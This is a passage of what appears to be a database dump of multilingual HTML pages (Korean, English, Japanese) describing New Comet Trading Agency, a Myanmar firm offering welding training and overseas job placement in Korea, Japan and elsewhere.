style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 172, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p>', '', 'full_html'),
('page', 0, 23, 172, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span 